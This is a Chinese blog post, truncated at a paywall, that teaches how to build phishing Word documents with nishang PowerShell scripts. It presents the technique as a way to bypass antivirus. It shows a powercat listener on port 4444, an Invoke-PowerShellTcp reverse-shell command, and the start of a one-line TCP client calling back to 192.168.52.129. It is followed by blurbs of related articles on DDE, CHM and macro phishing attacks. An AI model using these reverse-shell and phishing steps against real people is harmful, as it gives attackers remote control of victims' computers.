使用powershell Client进行有效钓鱼

最新推荐文章于 2025-04-14 10:36:46 发布
原创 最新推荐文章于 2025-04-14 10:36:46 发布 · 1.5k 阅读 · 20 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #网络 #开发语言 #安全 #web安全

0x00 简介

Powershell是windows下面非常强大的命令行工具,并且在windows中Powershell可以利用.NET Framework的强大功能,也可以调用windows API,在win7/server 2008以后,powershell已被集成在系统当中。 除此之外,使用powershell能很好的bypass各种AV,在渗透测试中可谓是一个神器。此次使用的是开源的powershell脚本集nishang中的client来制作钓鱼文件。其中office类型文件可以达到钓鱼目的的前提是office已经启用宏。

0x01制作word钓鱼文件

下载powercat (powershell的nc)

加载powercat :

PS G:\github\Pentest\powershell\powercat-master> . .\powercat.ps1
PS G:\github\Pentest\powershell\powercat-master> powercat
You must select either client mode (-c) or listen mode (-l).

加载以后使用powercat开启监听:

PS G:\github\Pentest\powershell\powercat-master> powercat -l -v -p 4444
详细信息: Set Stream 1: TCP
详细信息: Set Stream 2: Console
详细信息: Setting up Stream 1...
详细信息: Listening on [0.0.0.0] (port 4444)

测试加载Invoke-PowerShellTcp并执行:

PS G:\github\Pentest\powershell\nishang-master\Shells> . .\Invoke-PowerShellTcp.ps1
PS G:\github\Pentest\powershell\nishang-master\Shells> Invoke-PowerShellTcp -Reverse -IPAddress 127.0.0.1 -Port 4444

执行结果如下图:

图片

可以发现,直接获取了一个powershell的shell。下面制作word文件。 复制nishang中Invoke-PowerShellTcpOneLine.ps1 client代码,如下:

$client = New-Object System.Net.Sockets.TCPClient("192.168.52.129",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0
最低0.47元/天 解锁文章
利用PowerShell Empire实现Word文档DDE攻击控制(简单没啥用)
墨痕诉清风的博客
04-09 627
近期,有安全人员发现了一种DynamicData Exchange (DDE)协议绕过MSWord和MSExcel宏限制,不需使用MSWord和MSExcel漏洞,就能实现在Office文档中执行恶意命令目的。在这篇文章中,我将展示如何利用基于Empire的PowerShell来对Word文档进行“伪装”攻击,可能还有其它实现方法,我仅作个抛砖引玉。 创建Empire Listener 创建一个Empire Listener监听线程,可点此查看Empire的使用说明。 当监听线程启动运行之后,运行
钓鱼篇-CHM电子书上线CS
weixin_45701675的博客
11-23 2232
利用电子书上线cobalt strike
PowerPhish:用于网络钓鱼Powershell 脚本
06-04
| <'(((>< PowerPhish J >'(((>< <'(((>< By: Kirk Hayes (l0gan - @kirkphayes) 本准则和任何相关信息均按“原样”提供,不提供任何形式的明示或暗示保证,包括但不限于适销性和/或特定用途适用性的暗示保证。 使用、无法使用使用此代码导致的全部风险由用户承担。 用法:PowerPhish 是一个用于执行网络钓鱼Powershell 脚本设置以下变量: emailSmtpServer = 要连接的服务器以发送
11、setoolkit工具 构造钓鱼网站、powershell注入
无痕的博客
12-13 827
setoolkit工具的安装,用于 构造钓鱼网站、powershell注入
Powershell执行c程序&附带命令符
weixin_53391957的博客
04-04 2151
首先创建一个文本,输入代码后,将后缀名改为.c文件。 然后在该文件目录下执行Powershell(按住shift键,同时按住鼠标右键显示) 接着执行以下命令(一步编译生成): 一步编译生成gcc test.c -o test 多步编译执行: 预处理:gcc -E test.c -o test.i 编译位汇编代码:gcc -S test.i -o test.s 汇编成目标文件:gcc -c test.s -o test.o 连接生成目标文件:gcc test.o -o test 输出:./te
使用powershell Client进行有效dy
citelao的博客
03-22 879
使用powershell Client进行有效钓鱼 Evi1cg · 2015/09/11 16:40 0x00 简介 Powershell是windows下面非常强大的命令行工具,并且在windows中Powershell可以利用.NET Framework的强大功能,也可以调用windows API,在win7/server 2008以后,powershell已被集成在系统当
利用powershell开展网络钓鱼
aihua002的博客
06-27 507
快速方法是使用一个名为CustomUI Editor的程序,你可以在这里找到关于如何将其用于此目的的教程。我们不能推荐使用任何随机的.msi文件,所以我们将通过更手动的选项来完成。接下来,选择“插入” > “模块”,在这里你可以添加你的宏代码。要确保人们打开我们的恶意文件并执行它们,我们只需让微软努力工作多年来赢得人们的信任,然后将一些危险的宏插入到幻灯片中。本博文将介绍如何通过屏幕顶部的一个友好的警告提示,在用户启用宏后立即运行您的宏。接下来,你需要在与_rels目录同级的位置创建一个新目录。
鱼叉钓鱼:利用 Office 文档进行 DDE 攻击
weixin_45575473的博客
04-20 772
鱼叉钓鱼:利用 Office 文档进行 DDE 攻击 DDE DDE 是一个自定义字段,用户可插入文档。这些字段允许用户输入简单的说明,包括插入到新文档中的数据及插入位置。攻击者可以创建包含DDE字段的恶意Word文件(而不需要打开另一个Office应用程序)、打开命令提示符和运行恶意代码。 通常情况下,Office应用程序会显示两项告警内容。第一个是关于包含指向其他文件的链接的文档告警,第二个是关于打开远程命令提示符的错误告警。 在MSWord和MSExcel里,我们可以使用DDE来执行命令。 DDE 攻
掌握反向PowerShell:实施TCP命令接收的持久后门技术
防范这种攻击的方法包括:定期更新和打补丁PowerShell,限制PowerShell使用权限,使用反病毒软件和入侵检测系统等。同时,组织还应该对员工进行安全意识培训,教育他们如何识别和避免可能的攻击手段。
探索.NET平台的Cloudmersive APIClient
对于熟悉PowerShell开发者来说,如果想要使用PowerShell来管理.NET环境下的安装包,可以利用PowerShell的包管理命令与NuGet配合来安装和管理包。PowerShell提供了强大的脚本编写能力,可以自动化复杂的安装任务,...
Codes3D.zip启动脚本深挖:shell_bat_powershell中隐藏后门检测的6种信号
本文围绕压缩包文件Codes3D.zip中启动脚本存在的安全风险,系统分析了Shell、Batch与PowerShell三类脚本语言的执行机制及其在恶意行为中的利用方式。重点剖析了脚本自动执行链、权限提升路径及混淆反检测技术,并...
148.网络安全渗透测试—[Cobalt Strike系列]—[HTTP Beacon基础使用/脚本web传递/屏幕截图/端口扫描]
qwsn
03-19 3634
一、Cobalt Strike基本使用 1、Cobalt Strike简介 2、Cobalt Strike(CS)整体框架图 二、Cobalt Strike简单使用 1、实验坏境 2、实验过程
Powershell常用命令(下载、反弹、监听)
墨痕诉清风的博客
02-25 2137
【代码】Powershell常用命令(下载、反弹、监听)
使用powershell进行C编程
honev.blog.youkuaiyun.com
12-29 2275
使用powershell进行c编程是指,不依赖现有的编程环境(如VS、Clion等),直接使用命令行、记事本、编译器进行c编程。本篇博文的目的,旨在缺少易用的编程环境时,仍然能够通过计算机提供的最基本的条件进行编程,返璞归真。
Powershell脚本教程(一)
2302_80036039的博客
12-08 3369
实际当中powershell的功能是非常强大的,与cmd中的管道和重定向相比,cmd中的重定向主要是文本类的,powershell中的管道和重定向是面向对象的。$env: path =$env: path + "指定文件路径" 将文件添加到系统变量路径 (注:具有时效性)1、通过“get-command”获取Powershell的所有命令集。“ | ”前对象的输出作为“ | ”后对象的输入。9、F8 :检索包含指定字符的命令行历史记录。1、Alt+F7 :清除命令的历史记录。
powershell编译c语言,c/c++开发分享如何从C代码调用powershell脚本
weixin_29974217的博客
05-19 1066
#include#include // For access(). #include // For stat(). #include // For stat(). #include using namespace std; int main() { string strPath = "C:userssqtk-malscript1.ps1"; //access function: //The fun...
Windows 终端命令详解:PowerShell 初学者指南
最新发布
大数据领域创作新星
04-14 8558
Windows 终端是一个命令行工具,允许用户通过文本命令与系统交互,执行文件管理、系统配置和网络诊断等操作。PowerShell 是 Windows 终端的现代版本,相比传统的命令提示符(CMD),它功能更强大,支持脚本编写和复杂任务处理。本文将以 PowerShell 为主,带你从零开始学习。
System.Net.Sockets.TcpClient
weixin_34122604的博客
03-11 467
为 TCP 网络服务提供客户端连接。命名空间:System.Net.Sockets汇编集:System(在 system.dll 中)语法public class TcpClient : IDisposable备注TcpClient 类为了在同步阻塞模式中通过网络来连接、发送,并且接收数据流而提供了简单的方法。如果要让 TcpClient 能够连接并且交换数据,就需要以 TCP 的 Protoco...
Powershell(1)
Guardian027的博客
04-02 526
学习视频来自B站up主 **泷羽sec** 有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!有兴趣的小伙伴可以点击下面连接进入b站主页[B站泷羽sec](:PowerShell 是 Windows 生态下的核心工具,其面向对象特性与跨平台兼容性使其成为系统管理与安全攻防的必备技能。传递上一命令输出到下一命令输入(基于对象)自动补全命令 / 文件名。
使用Powershell进行环境代码清除的详细指南
- 对于临时的环境调整,考虑使用 `New-PSDrive` 创建临时的 PSDrive,或使用 `Set-Location` 来改变当前路径,这些操作仅对当前会话有效,不会对系统环境产生长期影响。 通过上述的知识点,我们可以了解到 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值